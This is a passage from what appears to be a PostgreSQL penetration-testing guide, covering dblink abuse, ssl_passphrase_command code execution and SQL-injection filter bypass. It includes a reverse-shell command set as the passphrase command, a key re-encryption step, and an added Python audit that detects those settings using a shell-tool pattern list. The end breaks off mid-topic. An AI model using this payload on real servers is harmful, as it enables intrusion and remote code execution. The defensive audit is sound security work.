dblink is a PostgreSQL module that offers several interesting options from the attacker's point of view. It can be used to connect to other PostgreSQL instances or to perform arbitrary TCP connections. These functionalities, along with the COPY FROM functionality, can be used to escalate privileges, perform port scanning or grab NTLM challenge responses. You can read here how to perform these attacks.
COPY cannot be used to write binary files, as it modifies some binary values.
ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key' : path to the private key of the database.
ssl_passphrase_command = '' : if the private key file is protected by a password (encrypted), PostgreSQL will execute the command indicated in this attribute to obtain the passphrase.
ssl_passphrase_command_supports_reload = off : if this attribute is on, the command used to obtain the passphrase of a password-protected key will also be executed when
openssl rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key
ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'
ssl_passphrase_command_supports_reload = on
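As an added defensive example (not code from the original page), the following Python audit parses a postgresql.conf fragment and flags the ssl_passphrase_command / ssl_passphrase_command_supports_reload combination described above, so the setting can be checked in configuration management or a host baseline; the sample configurations are constructed and the function names are assumptions of this example.

```python
import re
from typing import Dict, List

# Constructed sample: the risky configuration discussed above.
RISKY_CONF = """
ssl = on
ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'
ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'
ssl_passphrase_command_supports_reload = on
"""

# Constructed sample: default-like configuration, passphrase command left commented out.
SAFE_CONF = """
ssl = on
ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'
#ssl_passphrase_command = ''
#ssl_passphrase_command_supports_reload = off
"""

# name = value, optional trailing "# comment"; commented-out lines do not match.
_SETTING = re.compile(r"^\s*([A-Za-z_]+)\s*=\s*(.*?)\s*(?:#.*)?$")

# Tokens that indicate the passphrase "command" is really a shell or network tool.
SHELL_HINTS = ("bash", "sh -c", "/dev/tcp", "nc ", "python", "perl")


def parse_conf(text: str) -> Dict[str, str]:
    """Parse postgresql.conf-style lines into a dict, stripping single quotes."""
    settings: Dict[str, str] = {}
    for line in text.splitlines():
        m = _SETTING.match(line)
        if not m:
            continue
        name, value = m.group(1).lower(), m.group(2)
        if len(value) >= 2 and value[0] == value[-1] == "'":
            value = value[1:-1]
        settings[name] = value
    return settings


def audit_conf(text: str) -> List[str]:
    """Return human-readable findings about the ssl_passphrase_command settings."""
    s = parse_conf(text)
    findings: List[str] = []
    cmd = s.get("ssl_passphrase_command", "")
    if cmd:
        findings.append(f"ssl_passphrase_command is set: {cmd!r} runs as the postgres user when the key is loaded")
        if any(h in cmd for h in SHELL_HINTS):
            findings.append("ssl_passphrase_command invokes a shell/interpreter or network device: likely malicious")
    if s.get("ssl_passphrase_command_supports_reload", "off").lower() == "on":
        findings.append("ssl_passphrase_command_supports_reload=on: the command also runs on pg_reload_conf()/SIGHUP")
    return findings
```

The check only reports the weak configuration; the underlying control is that the data directory and postgresql.conf are not writable by the database superuser's SQL-reachable file functions.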
CHR for basic clauses (character concatenation only works for basic queries such as SELECT, INSERT, DELETE, etc.; it does not work for all SQL statements):
$. These queries return the same results: